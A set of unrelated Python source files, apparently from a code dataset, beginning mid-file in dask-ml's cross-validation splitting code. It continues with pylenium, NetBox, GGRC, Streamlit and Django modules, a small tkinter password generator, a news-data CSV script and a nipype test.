np.full(n_splits, n_samples // n_splits, dtype=np.int) fold_sizes[: n_samples % n_splits] += 1 chunks = X.chunks[0] seeds = [None] * len(chunks) if self.shuffle: rng = check_random_state(self.random_state) seeds = draw_seed(rng, 0, 2 ** 32 - 1, size=len(chunks), dtype="uint") test_current = 0 for fold_size in fold_sizes: test_start, test_stop = test_current, test_current + fold_size yield self._split(test_start, test_stop, n_samples, chunks, seeds) test_current = test_stop def _split(self, test_start, test_stop, n_samples, chunks, seeds): train_objs = [] test_objs = [] train_sizes = [] test_sizes = [] offset = 0 for chunk, seed in zip(chunks, seeds): start, stop = offset, offset + chunk test_id_start = max(test_start, start) test_id_stop = min(test_stop, stop) if test_id_start < test_id_stop: test_objs.append( dask.delayed(_generate_offset_idx)( chunk, test_id_start, test_id_stop, offset, seed ) ) test_sizes.append(test_id_stop - test_id_start) train_id_stop = min(test_id_start, stop) if train_id_stop > start: train_objs.append( dask.delayed(_generate_offset_idx)( chunk, start, train_id_stop, offset, seed ) ) train_sizes.append(train_id_stop - start) train_id_start = max(test_id_stop, start) if train_id_start < stop: train_objs.append( dask.delayed(_generate_offset_idx)( chunk, train_id_start, stop, offset, seed ) ) train_sizes.append(stop - train_id_start) offset = stop train_idx = da.concatenate( [ da.from_delayed(obj, (train_size,), "i8") for obj, train_size in zip(train_objs, train_sizes) ] ) test_idx = da.concatenate( [ da.from_delayed(obj, (test_size,), "i8") for obj, test_size in zip(test_objs, test_sizes) ] ) return train_idx, test_idx def get_n_splits(self, X=None, y=None, groups=None): return self.n_splits def _blockwise_slice(arr, idx): """Slice an array that is blockwise-aligned with idx. Parameters ---------- arr : Dask array idx : Dask array Should have the following properties * Same blocks as `arr` along the first dimension * Contains only integers * Each block's values should be between ``[0, len(block))`` Returns ------- sliced : dask.Array """ objs = [] offsets = np.hstack([0, np.cumsum(arr.chunks[0])[:-1]]) for i, (x, idx2) in enumerate( zip(arr.to_delayed().ravel(), idx.to_delayed().ravel()) ): idx3 = idx2 - offsets[i] objs.append(x[idx3]) shapes = idx.chunks[0] if arr.ndim == 2: P = arr.shape[1] shapes = [(x, P) for x in shapes] else: shapes = [(x,) for x in shapes] sliced = da.concatenate( [ da.from_delayed(x, shape=shape, dtype=arr.dtype) for x, shape in zip(objs, shapes) ] ) return sliced def train_test_split(*arrays, **options): """Split arrays into random train and test matricies. Parameters ---------- *arrays : Sequence of Dask Arrays test_size : float or int, default 0.1 train_size : float or int, optional random_state : int, RandomState instance or None, optional (default=None) If int, random_state is the seed used by the random number generator; If RandomState instance, random_state is the random number generator; If None, the random number generator is the RandomState instance used by `np.random`. shuffle : bool, default True Whether to shuffle the data before splitting. blockwise : bool, optional. Whether to shuffle data only within blocks (True), or allow data to be shuffled between blocks (False). Shuffling between blocks can be much more expensive, especially in distributed environments. The default behavior depends on the types in arrays. For Dask Arrays, the default is True (data are not shuffled between blocks). For Dask DataFrames, the default and only allowed value is False (data are shuffled between blocks). Returns ------- splitting : list, length=2 * len(arrays) List containing train-test split of inputs Examples -------- >>> import dask.array as da >>> from dask_ml.datasets import make_regression >>> X, y = make_regression(n_samples=125, n_features=4, chunks=50, ... random_state=0) >>> X_train, X_test, y_train, y_test = train_test_split(X, y, ... random_state=0) >>> X_train dask.array<concatenate, shape=(113, 4), dtype=float64, chunksize=(45, 4)> >>> X_train.compute()[:2] array([[ 0.12372191, 0.58222459, 0.92950511, -2.09460307], [ 0.99439439, -0.70972797, -0.27567053, 1.73887268]]) """ test_size = options.pop("test_size", None) train_size = options.pop("train_size", None) random_state = options.pop("random_state", None) shuffle = options.pop("shuffle", True) blockwise = options.pop("blockwise", None) if train_size is None and test_size is None: # all other validation dones elsewhere. test_size = 0.1 if options: raise TypeError("Unexpected options {}".format(options)) if not shuffle: raise NotImplementedError("'shuffle=False' is not currently supported.") if all(isinstance(arr, (dd.Series, dd.DataFrame)) for arr in arrays): check_matching_blocks(*arrays) if blockwise is None: blockwise = False rng = check_random_state(random_state) rng = draw_seed(rng, 0, 2 ** 32 - 1, dtype="uint") return list( itertools.chain.from_iterable( arr.random_split([train_size, test_size], random_state=rng) for arr in arrays ) ) elif all(isinstance(arr, da.Array) for arr in arrays): if blockwise is None: blockwise = True splitter = ShuffleSplit( n_splits=1, test_size=test_size, train_size=train_size, blockwise=blockwise, random_state=random_state, ) train_idx, test_idx = next(splitter.split(*arrays)) train_test_pairs = ( (_blockwise_slice(arr, train_idx), _blockwise_slice(arr, test_idx)) for arr in arrays ) return list(itertools.chain.from_iterable(train_test_pairs)) else: logger.warning("Mixture of types in 'arrays'. Falling back to scikit-learn.") return ms.train_test_split( *arrays, test_size=test_size, train_size=train_size, random_state=random_state, shuffle=shuffle )
py
7dfceafb0e652164e3d1009e26ff8183a7011ba0
from typing import Dict from pytest import UsageError from pylenium.exceptions.exceptions import NoCapabilitiesDictionaryException from os.path import isfile import importlib.util def is_py_file(path: str) -> str: """ Raise a pytest UsageError if the path provided is not one of a valid .py file :param path: the file path passed as an arg to some command line options :return: the path if it was successfully located """ if not path.endswith(".py"): raise UsageError(f"File path provided: {path} was not a .py file") if not isfile(path): raise UsageError(f"Pylenium was unable to find the file provided at: {path}") return path def parse_capabilities_from_disk(path: str) -> Dict: """ Takes the path provided to --browser-capabilities; loads it and attempts to discovery a 'capabilities' dictionary. Note: This must be explicitly called 'capabilities' and should be of <class 'dict'> :param path: the path on the file system to load :return: The dictionary of desired capabilities that we found """ is_py_file(path) spec = importlib.util.spec_from_file_location(name="py_desired_caps", location=path) mod = importlib.util.module_from_spec(spec) spec.loader.exec_module(mod) try: caps = mod.capabilities if not isinstance(caps, Dict): raise ValueError( f"The .py file provided: {path} contained a 'capabilities' attribute, but it was not of" f"type<Dict>" ) return caps except AttributeError: raise NoCapabilitiesDictionaryException( f"The .py file provided: {path} did not have a 'capabilities' attribute" f"Make sure it contains one, explicitly called 'capabilities'" ) from None
py
7dfceb39009879c5df7db62c4cb2694f3b58d489
from __future__ import unicode_literals from collections import OrderedDict from django import forms from django.contrib.auth.models import User from django.contrib.contenttypes.models import ContentType from django.core.exceptions import ObjectDoesNotExist from mptt.forms import TreeNodeMultipleChoiceField from taggit.forms import TagField from taggit.models import Tag from dcim.models import DeviceRole, Platform, Region, Site from tenancy.models import Tenant, TenantGroup from utilities.forms import ( add_blank_choice, BootstrapMixin, BulkEditForm, FilterChoiceField, FilterTreeNodeMultipleChoiceField, LaxURLField, JSONField, SlugField, ) from .constants import ( CF_FILTER_DISABLED, CF_TYPE_BOOLEAN, CF_TYPE_DATE, CF_TYPE_INTEGER, CF_TYPE_SELECT, CF_TYPE_URL, OBJECTCHANGE_ACTION_CHOICES, ) from .models import ConfigContext, CustomField, CustomFieldValue, ImageAttachment, ObjectChange # # Custom fields # def get_custom_fields_for_model(content_type, filterable_only=False, bulk_edit=False): """ Retrieve all CustomFields applicable to the given ContentType """ field_dict = OrderedDict() custom_fields = CustomField.objects.filter(obj_type=content_type) if filterable_only: custom_fields = custom_fields.exclude(filter_logic=CF_FILTER_DISABLED) for cf in custom_fields: field_name = 'cf_{}'.format(str(cf.name)) initial = cf.default if not bulk_edit else None # Integer if cf.type == CF_TYPE_INTEGER: field = forms.IntegerField(required=cf.required, initial=initial) # Boolean elif cf.type == CF_TYPE_BOOLEAN: choices = ( (None, '---------'), (1, 'True'), (0, 'False'), ) if initial is not None and initial.lower() in ['true', 'yes', '1']: initial = 1 elif initial is not None and initial.lower() in ['false', 'no', '0']: initial = 0 else: initial = None field = forms.NullBooleanField( required=cf.required, initial=initial, widget=forms.Select(choices=choices) ) # Date elif cf.type == CF_TYPE_DATE: field = forms.DateField(required=cf.required, initial=initial, help_text="Date format: YYYY-MM-DD") # Select elif cf.type == CF_TYPE_SELECT: choices = [(cfc.pk, cfc) for cfc in cf.choices.all()] if not cf.required or bulk_edit or filterable_only: choices = [(None, '---------')] + choices # Check for a default choice default_choice = None if initial: try: default_choice = cf.choices.get(value=initial).pk except ObjectDoesNotExist: pass field = forms.TypedChoiceField(choices=choices, coerce=int, required=cf.required, initial=default_choice) # URL elif cf.type == CF_TYPE_URL: field = LaxURLField(required=cf.required, initial=initial) # Text else: field = forms.CharField(max_length=255, required=cf.required, initial=initial) field.model = cf field.label = cf.label if cf.label else cf.name.replace('_', ' ').capitalize() if cf.description: field.help_text = cf.description field_dict[field_name] = field return field_dict class CustomFieldForm(forms.ModelForm): def __init__(self, *args, **kwargs): self.custom_fields = [] self.obj_type = ContentType.objects.get_for_model(self._meta.model) super(CustomFieldForm, self).__init__(*args, **kwargs) # Add all applicable CustomFields to the form custom_fields = [] for name, field in get_custom_fields_for_model(self.obj_type).items(): self.fields[name] = field custom_fields.append(name) self.custom_fields = custom_fields # If editing an existing object, initialize values for all custom fields if self.instance.pk: existing_values = CustomFieldValue.objects.filter(obj_type=self.obj_type, obj_id=self.instance.pk)\ .select_related('field') for cfv in existing_values: self.initial['cf_{}'.format(str(cfv.field.name))] = cfv.serialized_value def _save_custom_fields(self): for field_name in self.custom_fields: try: cfv = CustomFieldValue.objects.select_related('field').get(field=self.fields[field_name].model, obj_type=self.obj_type, obj_id=self.instance.pk) except CustomFieldValue.DoesNotExist: # Skip this field if none exists already and its value is empty if self.cleaned_data[field_name] in [None, '']: continue cfv = CustomFieldValue( field=self.fields[field_name].model, obj_type=self.obj_type, obj_id=self.instance.pk ) cfv.value = self.cleaned_data[field_name] cfv.save() def save(self, commit=True): obj = super(CustomFieldForm, self).save(commit) # Handle custom fields the same way we do M2M fields if commit: self._save_custom_fields() else: self.save_custom_fields = self._save_custom_fields return obj class CustomFieldBulkEditForm(BulkEditForm): def __init__(self, *args, **kwargs): super(CustomFieldBulkEditForm, self).__init__(*args, **kwargs) self.custom_fields = [] self.obj_type = ContentType.objects.get_for_model(self.model) # Add all applicable CustomFields to the form custom_fields = get_custom_fields_for_model(self.obj_type, bulk_edit=True).items() for name, field in custom_fields: # Annotate non-required custom fields as nullable if not field.required: self.nullable_fields.append(name) field.required = False self.fields[name] = field # Annotate this as a custom field self.custom_fields.append(name) class CustomFieldFilterForm(forms.Form): def __init__(self, *args, **kwargs): self.obj_type = ContentType.objects.get_for_model(self.model) super(CustomFieldFilterForm, self).__init__(*args, **kwargs) # Add all applicable CustomFields to the form custom_fields = get_custom_fields_for_model(self.obj_type, filterable_only=True).items() for name, field in custom_fields: field.required = False self.fields[name] = field # # Tags # class TagForm(BootstrapMixin, forms.ModelForm): slug = SlugField() class Meta: model = Tag fields = ['name', 'slug'] class AddRemoveTagsForm(forms.Form): def __init__(self, *args, **kwargs): super(AddRemoveTagsForm, self).__init__(*args, **kwargs) # Add add/remove tags fields self.fields['add_tags'] = TagField(required=False) self.fields['remove_tags'] = TagField(required=False) # # Config contexts # class ConfigContextForm(BootstrapMixin, forms.ModelForm): regions = TreeNodeMultipleChoiceField( queryset=Region.objects.all(), required=False ) data = JSONField() class Meta: model = ConfigContext fields = [ 'name', 'weight', 'description', 'is_active', 'regions', 'sites', 'roles', 'platforms', 'tenant_groups', 'tenants', 'data', ] class ConfigContextFilterForm(BootstrapMixin, forms.Form): q = forms.CharField( required=False, label='Search' ) region = FilterTreeNodeMultipleChoiceField( queryset=Region.objects.all(), to_field_name='slug' ) site = FilterChoiceField( queryset=Site.objects.all(), to_field_name='slug' ) role = FilterChoiceField( queryset=DeviceRole.objects.all(), to_field_name='slug' ) platform = FilterChoiceField( queryset=Platform.objects.all(), to_field_name='slug' ) tenant_group = FilterChoiceField( queryset=TenantGroup.objects.all(), to_field_name='slug' ) tenant = FilterChoiceField( queryset=Tenant.objects.all(), to_field_name='slug' ) # # Image attachments # class ImageAttachmentForm(BootstrapMixin, forms.ModelForm): class Meta: model = ImageAttachment fields = ['name', 'image'] # # Change logging # class ObjectChangeFilterForm(BootstrapMixin, CustomFieldFilterForm): model = ObjectChange q = forms.CharField( required=False, label='Search' ) # TODO: Change time_0 and time_1 to time_after and time_before for django-filter==2.0 time_0 = forms.DateTimeField( label='After', required=False, widget=forms.TextInput( attrs={'placeholder': 'YYYY-MM-DD hh:mm:ss'} ) ) time_1 = forms.DateTimeField( label='Before', required=False, widget=forms.TextInput( attrs={'placeholder': 'YYYY-MM-DD hh:mm:ss'} ) ) action = forms.ChoiceField( choices=add_blank_choice(OBJECTCHANGE_ACTION_CHOICES), required=False ) user = forms.ModelChoiceField( queryset=User.objects.order_by('username'), required=False )
py
7dfceba4c8be608d31ffa0df5f8a9dd22e6cc56a
# Copyright (C) 2019 Google Inc. # Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file> """A module containing the implementation of the assessment template entity.""" from collections import OrderedDict from sqlalchemy import orm from sqlalchemy.orm import validates from werkzeug.exceptions import Forbidden from ggrc import db from ggrc.access_control.roleable import Roleable from ggrc import login from ggrc.builder import simple_property from ggrc.models import assessment from ggrc.models import audit from ggrc.models import mixins from ggrc.models import relationship from ggrc.models.mixins import base from ggrc.models.mixins import clonable from ggrc.models.mixins import issue_tracker from ggrc.models.exceptions import ValidationError from ggrc.models.reflection import AttributeInfo from ggrc.models import reflection from ggrc.models.types import JsonType from ggrc.services import signals from ggrc.fulltext.mixin import Indexed from ggrc.rbac.permissions import permissions_for def _hint_verifier_assignees(actual_people_label, control_people_label, risk_people_label): """Returns description default verifiers/assignees fields""" description = "For all Assessment Types except of " \ "Control and Risk options are:\n{}\[email protected]\n" \ "For Assessment type of Control options are:\n{}\n" \ "[email protected]\n" \ "For Assessment type of Risk options are:\n{}\n" \ "[email protected]".format( "\n".join(actual_people_label.values()), "\n".join(control_people_label.values()), "\n".join(risk_people_label.values())) return description class AssessmentTemplate(assessment.AuditRelationship, relationship.Relatable, mixins.Titled, mixins.CustomAttributable, Roleable, issue_tracker.IssueTrackedWithConfig, base.ContextRBAC, mixins.Slugged, mixins.Stateful, clonable.MultiClonable, Indexed, db.Model): """A class representing the assessment template entity. An Assessment Template is a template that allows users for easier creation of multiple Assessments that are somewhat similar to each other, avoiding the need to repeatedly define the same set of properties for every new Assessment object. """ __tablename__ = "assessment_templates" _mandatory_default_people = ("assignees",) PER_OBJECT_CUSTOM_ATTRIBUTABLE = True RELATED_TYPE = 'assessment' # the type of the Default Assessment Type template_object_type = db.Column(db.String, nullable=True) # whether to use the control test plan as a procedure test_plan_procedure = db.Column(db.Boolean, nullable=False, default=False) # procedure description procedure_description = db.Column(db.Text, nullable=False, default=u"") # the people that should be assigned by default to each assessment created # within the releated audit default_people = db.Column(JsonType, nullable=False) # parent audit audit_id = db.Column(db.Integer, db.ForeignKey('audits.id'), nullable=False) # labels to show to the user in the UI for various default people values DEFAULT_PEOPLE_LABELS = OrderedDict([ ("Admin", "Object Admins"), ("Audit Lead", "Audit Captain"), ("Auditors", "Auditors"), ("Principal Assignees", "Principal Assignees"), ("Secondary Assignees", "Secondary Assignees"), ("Primary Contacts", "Primary Contacts"), ("Secondary Contacts", "Secondary Contacts"), ("Control Operators", "Control Operators"), ("Control Owners", "Control Owners"), ("Risk Owners", "Risk Owners"), ("Other Contacts", "Other Contacts"), ]) # labels to show as hint all Assessment Types except of Control and Risk _DEFAULT_PEOPLE_LABELS_ACTUAL = OrderedDict([ ("Admin", "Object Admins"), ("Audit Lead", "Audit Captain"), ("Auditors", "Auditors"), ("Principal Assignees", "Principal Assignees"), ("Secondary Assignees", "Secondary Assignees"), ("Primary Contacts", "Primary Contacts"), ("Secondary Contacts", "Secondary Contacts"), ]) # labels to show as hint in Default Assignees/Verifiers for Control _DEFAULT_PEOPLE_LABELS_CONTROL = OrderedDict([ ("Admin", "Object Admins"), ("Audit Lead", "Audit Captain"), ("Auditors", "Auditors"), ("Principal Assignees", "Principal Assignees"), ("Secondary Assignees", "Secondary Assignees"), ("Control Operators", "Control Operators"), ("Control Owners", "Control Owners"), ("Other Contacts", "Other Contacts"), ]) # labels to show as hint in Default Assignees/Verifiers for Risk _DEFAULT_PEOPLE_LABELS_RISK = OrderedDict([ ("Admin", "Object Admins"), ("Audit Lead", "Audit Captain"), ("Auditors", "Auditors"), ("Principal Assignees", "Principal Assignees"), ("Secondary Assignees", "Secondary Assignees"), ("Risk Owners", "Risk Owners"), ("Other Contacts", "Other Contacts"), ]) _title_uniqueness = False DRAFT = 'Draft' ACTIVE = 'Active' DEPRECATED = 'Deprecated' VALID_STATES = (DRAFT, ACTIVE, DEPRECATED, ) # REST properties _api_attrs = reflection.ApiAttributes( 'template_object_type', 'test_plan_procedure', 'procedure_description', 'default_people', 'audit', reflection.Attribute('issue_tracker', create=False, update=False), reflection.Attribute('archived', create=False, update=False), reflection.Attribute( 'DEFAULT_PEOPLE_LABELS', create=False, update=False), ) _fulltext_attrs = [ "archived" ] _custom_publish = { 'audit': audit.build_audit_stub, } DEFAULT_ASSESSMENT_TYPE_OPTIONS = ("Access Groups", "Account Balances", "Data Assets", "Facilities", "Key Reports", "Markets", "Org Groups", "Processes", "Product Groups", "Products", "Systems", "Technology Environments", "Vendors", "Contracts", "Controls", "Objectives", "Policies", "Regulations", "Requirements", "Risks", "Standards", "Threats", ) _aliases = { "status": { "display_name": "State", "mandatory": False, "description": "Options are:\n{}".format('\n'.join(VALID_STATES)) }, "default_assignees": { "display_name": "Default Assignees", "mandatory": True, "filter_by": "_nop_filter", "description": _hint_verifier_assignees( _DEFAULT_PEOPLE_LABELS_ACTUAL, _DEFAULT_PEOPLE_LABELS_CONTROL, _DEFAULT_PEOPLE_LABELS_RISK, ) }, "default_verifier": { "display_name": "Default Verifiers", "mandatory": False, "filter_by": "_nop_filter", "description": _hint_verifier_assignees( _DEFAULT_PEOPLE_LABELS_ACTUAL, _DEFAULT_PEOPLE_LABELS_CONTROL, _DEFAULT_PEOPLE_LABELS_RISK, ) }, "procedure_description": { "display_name": "Default Assessment Procedure", "filter_by": "_nop_filter", }, "test_plan_procedure": { "display_name": "Use Control Assessment Procedure", "mandatory": False, }, "template_object_type": { "display_name": "Default Assessment Type", "mandatory": True, "description": "Allowed values are:\n{}".format( '\n'.join(DEFAULT_ASSESSMENT_TYPE_OPTIONS)), }, "archived": { "display_name": "Archived", "mandatory": False, "ignore_on_update": True, "view_only": True, }, "template_custom_attributes": { "display_name": "Custom Attributes", "type": AttributeInfo.Type.SPECIAL_MAPPING, "filter_by": "_nop_filter", "description": ( "List of custom attributes for the assessment template\n" "One attribute per line. fields are separated by commas ','\n\n" "<attribute type>, <attribute name>, [<attribute value1>, " "<attribute value2>, ...]\n\n" "Valid attribute types: Text, Rich Text, Date, Checkbox, Person," "Multiselect, Dropdown.\n" "attribute name: Any single line string without commas. Leading " "and trailing spaces are ignored.\n" "list of attribute values: Comma separated list, only used if " "attribute type is 'Dropdown'. Prepend '(a)' if the value has a " "mandatory attachment and/or (c) if the value requires a " "mandatory comment.\n\n" "Limitations: Dropdown values can not start with either '(a)' or" "'(c)' and attribute names can not contain commas ','." ), }, } @classmethod def eager_query(cls, **kwargs): query = super(AssessmentTemplate, cls).eager_query(**kwargs) return query.options( orm.Load(cls).joinedload("audit").undefer_group("Audit_complete"), orm.Load(cls).joinedload("audit").joinedload( audit.Audit.issuetracker_issue ), ) @classmethod def indexed_query(cls): query = super(AssessmentTemplate, cls).indexed_query() return query.options( orm.Load(cls).joinedload("audit").undefer_group("Audit_complete") ) @classmethod def _nop_filter(cls, _): """No operation filter. This is used for objects for which we can not implement a normal sql query filter. Example is default_verifier field that is a json string in the db and we can not create direct queries on json fields. """ return None @classmethod def generate_slug_prefix(cls): return "TEMPLATE" def _clone(self, target=None): """Clone Assessment Template. Args: target: Destination Audit object. Returns: Instance of assessment template copy. """ data = { "title": self.title, "audit": target, "template_object_type": self.template_object_type, "test_plan_procedure": self.test_plan_procedure, "procedure_description": self.procedure_description, "default_people": self.default_people, "modified_by": login.get_current_user(), "status": self.status, } assessment_template_copy = AssessmentTemplate(**data) db.session.add(assessment_template_copy) return assessment_template_copy def clone(self, target): """Clone Assessment Template and related custom attributes.""" assessment_template_copy = self._clone(target) rel = relationship.Relationship( source=target, destination=assessment_template_copy ) db.session.add(rel) db.session.flush() # pylint: disable=not-an-iterable for cad in self.custom_attribute_definitions: # pylint: disable=protected-access cad._clone(assessment_template_copy) return (assessment_template_copy, rel) @validates('default_people') def validate_default_people(self, key, value): """Check that default people lists are not empty. Check if the default_people contains both assignees and verifiers. The values of those fields must be truthy, and if the value is a string it must be a valid default people label. If the value is not a string, it should be a list of valid user ids, but that is too expensive to test in this validator. """ # pylint: disable=unused-argument for mandatory in self._mandatory_default_people: mandatory_value = value.get(mandatory) if (not mandatory_value or isinstance(mandatory_value, list) and any(not isinstance(p_id, (int, long)) for p_id in mandatory_value) or isinstance(mandatory_value, basestring) and mandatory_value not in self.DEFAULT_PEOPLE_LABELS): raise ValidationError( 'Invalid value for default_people.{field}. Expected a people ' 'label in string or a list of int people ids, received {value}.' .format(field=mandatory, value=mandatory_value), ) return value @simple_property def archived(self): """Fetch the archived boolean from Audit""" if hasattr(self, 'context') and hasattr(self.context, 'related_object'): return getattr(self.context.related_object, 'archived', False) return False def create_audit_relationship(audit_stub, obj): """Create audit to assessment template relationship""" # pylint: disable=W0212 parent_audit = audit.Audit.query.get(audit_stub["id"]) if not permissions_for()._is_allowed_for(parent_audit, "update"): raise Forbidden() rel = relationship.Relationship( source=parent_audit, destination=obj, context=parent_audit.context) db.session.add(rel) @signals.Restful.model_posted.connect_via(AssessmentTemplate) def handle_assessment_template(sender, obj=None, src=None, service=None): # pylint: disable=unused-argument """Handle Assessment Template POST If "audit" is set on POST, create relationship with Assessment template. """ if "audit" in src: create_audit_relationship(src["audit"], obj)
py
7dfcecdd6b1d909d159ecd059d519a3cb47bdddd
# coding=utf-8 # ============================================================================= # Website Finder # ============================================================================= # # A function returning the homepage of the website of a media # import re import json import csv from tqdm import tqdm dic_homepage = {"La Voix du Nord": "www.lavoixdunord.fr", "Le Figaro": "www.lefigaro.fr", "La Montagne": "www.lamontagne.fr", "Les Echos": "www.lesechos.fr", "Le Courrier de l'Ouest": "www.ouest-france.fr", "La Dépêche du Midi": "www.ladepeche.fr", "Le Télégramme": "www.letelegramme.fr", "Le Figaro Magazine": "https:/www.lefigaro.fr/lefigaromagazine", "La Nouvelle République du Centre Ouest": "www.lanouvellerepublique.fr", "Les Echos Business": "business.lesechos.fr", "Sud Ouest": "www.sudouest.fr", "Le Républicain Lorrain": "www.republicain-lorrain.fr", "Les Echos Executives": "business.lesechos.fr", "M, le magazine du Monde": "www.lemonde.fr/m-le-mag", "La Croix": "www.la-croix.com", "Les Echos Business.fr": "business.lesechos.fr", "Capitalfinance.fr": "capitalfinance.lesechos.fr", "Le Cercle Les Echos": "inurl:lesechos.fr/idees-debats/cercle", "Capital Finance": "capitalfinance.lesechos.fr", "Les Echos Week-End": "weekend.lesechos.fr", "Le Progrès": "www.leprogres.fr", "Midi Libre": "www.midilibre.fr/actu", "Les Echos.fr": "www.lesechos.fr/", "La Provence": "www.laprovence.com", "La Nouvelle République Dimanche": "www.lanouvellerepublique.fr", "Ouest France": "www.ouest-france.fr", "L'Est Républicain": "www.estrepublicain.fr", "Le Figaro Premium": "plus.lefigaro.fr/tag/figaro-premium", "Enjeux Les Echos": "www.lesechos.fr" } # site:domain.com/path ("titre article 1" OR "titre article 2") filepath = "factiva_fr_final.csv" # filepath = "small_extract.csv" media = set() csv_HP = [] with open('article_with_AN_FR.csv', 'w', newline='', encoding="utf-8") as new_csv: with open(filepath, encoding="utf-8") as csv_file: csv_reader = csv.reader(csv_file, delimiter=",") csv_writer = csv.writer(new_csv, delimiter=",") first_row = ["title", "date", "media", "homepage", "AN"] csv_writer.writerow(first_row) next(csv_reader) #let the first line for line in tqdm(csv_reader, total=770967): try: newline = [] AN = line[15].split(" ")[1] newline.extend([line[3], line[8], line[25], dic_homepage[line[25]], AN]) csv_writer.writerow(newline) except: print("could not find",line[25],"in the dictionnary") print(csv_writer)
py
7dfced640e013f0455860f5f365970ead6f25578
import _tkinter from string import punctuation, ascii_letters, digits import random import tkinter as tk from tkinter import messagebox root=tk.Tk() def create_passw(length): try: length=int(length) all=punctuation+ascii_letters+digits secure_random=random.SystemRandom() password="".join(secure_random.choice(all) for i in range(length)) e2.insert (10, password) except ValueError: e2.insert(10, "Enter Numeric Value !") def clear(): e1.delete(0,tk.END) e2.delete(0,tk.END) def exit(): ex = messagebox.askyesno ("Password Generator", "Confirm if you want to exit") if ex > 0: root.quit () return root.geometry('600x350+0+0') root.configure(bg='violet') try: photo = tk.PhotoImage (file="key.ico") root.iconphoto (False, photo) except _tkinter.TclError: pass size=tk.StringVar() L1=tk.Label(root,text="PASSWORD GENERATOR",font=('arial',20,'bold','underline'),bg='violet') L1.grid(row=0, column=0) L2=tk.Label(root,text="Enter the Length of intended password:",font=('lucida handwriting',10),bg='violet') L2.grid(row=3, column=0) e1=tk.Entry(root,text=size) e1.grid(row=3, column=1) b1=tk.Button(root,text="PASSWORD =",command=lambda:create_passw(e1.get())) b1.grid(row=4, column=0,padx=10,pady=1) e2=tk.Entry(root) e2.grid(row=4, column=1) b2=tk.Button(root,text="CLEAR",command=lambda:clear()) b2.grid(row=5, column=0,padx=10,pady=10) b3=tk.Button(root,text="EXIT",command=lambda:exit()) b3.grid(row=5, column=1,padx=10,pady=10) root.mainloop()
py
7dfced6825ba436851eda679d4ad59407172e202
import streamlit as st from PIL import Image, ImageDraw import numpy as np import io from typing import Tuple DEMO_IMAGE = "test-images/smart_meter.jpg" RED = (255, 0, 0) # For objects within the ROI DEFAULT_ROI_Y_MIN = 0.0 DEFAULT_ROI_Y_MAX = 1.0 DEFAULT_ROI_X_MIN = 0.0 DEFAULT_ROI_X_MAX = 1.0 st.sidebar.title("ROI") ROI_X_MIN = st.sidebar.slider("x_min", 0.0, 1.0, DEFAULT_ROI_X_MIN) ROI_Y_MIN = st.sidebar.slider("y_min", 0.0, 1.0, DEFAULT_ROI_Y_MIN) ROI_X_MAX = st.sidebar.slider("x_max", 0.0, 1.0, DEFAULT_ROI_X_MAX) ROI_Y_MAX = st.sidebar.slider("y_max", 0.0, 1.0, DEFAULT_ROI_Y_MAX) ROI_TUPLE = ( ROI_Y_MIN, ROI_X_MIN, ROI_Y_MAX, ROI_X_MAX, ) def draw_box( draw: ImageDraw, box: Tuple[float, float, float, float], img_width: int, img_height: int, text: str = "", color: Tuple[int, int, int] = (255, 255, 0), ) -> None: """ Draw a bounding box on and image. The bounding box is defined by the tuple (y_min, x_min, y_max, x_max) where the coordinates are floats in the range [0.0, 1.0] and relative to the width and height of the image. For example, if an image is 100 x 200 pixels (height x width) and the bounding box is `(0.1, 0.2, 0.5, 0.9)`, the upper-left and bottom-right coordinates of the bounding box will be `(40, 10)` to `(180, 50)` (in (x,y) coordinates). """ line_width = 10 y_min, x_min, y_max, x_max = box (left, right, top, bottom) = ( x_min * img_width, x_max * img_width, y_min * img_height, y_max * img_height, ) draw.line( [(left, top), (left, bottom), (right, bottom), (right, top), (left, top)], width=line_width, fill=color, ) st.title("Integration config helper app") st.text("This app is to help determine the ROI config for your image processing integration") st.text("Upload an image from your camera and adjust the sliders to outline the text you wish to capture") img_file_buffer = st.file_uploader("Upload an image", type=["png", "jpg", "jpeg"]) if img_file_buffer is not None: pil_image = Image.open(img_file_buffer) else: pil_image = Image.open(DEMO_IMAGE) draw = ImageDraw.Draw(pil_image) draw_box( draw, ROI_TUPLE, pil_image.width, pil_image.height, color=RED, ) st.text('Top left is (x=0, y=0), bottom left is (x=0, y=1), bottom right is (x=1, y=1)') st.image( pil_image, use_column_width=True, ) config_yaml = f""" roi_x_min: {ROI_X_MIN} \n roi_x_max: {ROI_X_MAX} \n roi_y_min: {ROI_Y_MIN} \n roi_y_max: {ROI_Y_MAX} \n """ st.write('The roi values to enter in your integration config are:') st.markdown(config_yaml, unsafe_allow_html=True)
py
7dfcef427f2aefeaf931cee2ff87efc936db4537
from django.urls import path from . import views urlpatterns = [ # API path('', views.retrieve_all_public_posts_on_local_server, name='post_index'), path('<str:post_id>/', views.retrieve_single_post_with_id, name='post'), path('<str:post_id>/comments/', views.comments_retrieval_and_creation_to_post_id, name="get_or_add_comment"), #Internal use only path("fetch_public_posts", views.fetch_public_posts_from_nodes), path("proxy_image/<path:image_url>", views.proxy_foreign_server_image, name='proxy_image') ]
py
7dfcefb5bedfa4e6ff971a03eee0ea2b6cdb8759
# AUTO-GENERATED by tools/checkspecs.py - DO NOT EDIT from ....testing import assert_equal from ..surface import MergeModels def test_MergeModels_inputs(): input_map = dict(Model1=dict(argstr='%s', position=-3, ), Model2=dict(argstr='%s', position=-2, ), ModelOutput=dict(argstr='%s', hash_files=False, position=-1, ), args=dict(argstr='%s', ), environ=dict(nohash=True, usedefault=True, ), ignore_exception=dict(nohash=True, usedefault=True, ), terminal_output=dict(nohash=True, ), ) inputs = MergeModels.input_spec() for key, metadata in list(input_map.items()): for metakey, value in list(metadata.items()): yield assert_equal, getattr(inputs.traits()[key], metakey), value def test_MergeModels_outputs(): output_map = dict(ModelOutput=dict(position=-1, ), ) outputs = MergeModels.output_spec() for key, metadata in list(output_map.items()): for metakey, value in list(metadata.items()): yield assert_equal, getattr(outputs.traits()[key], metakey), value
py
7dfceffa99fee0d71c65e04b36df493ce2c79d8f
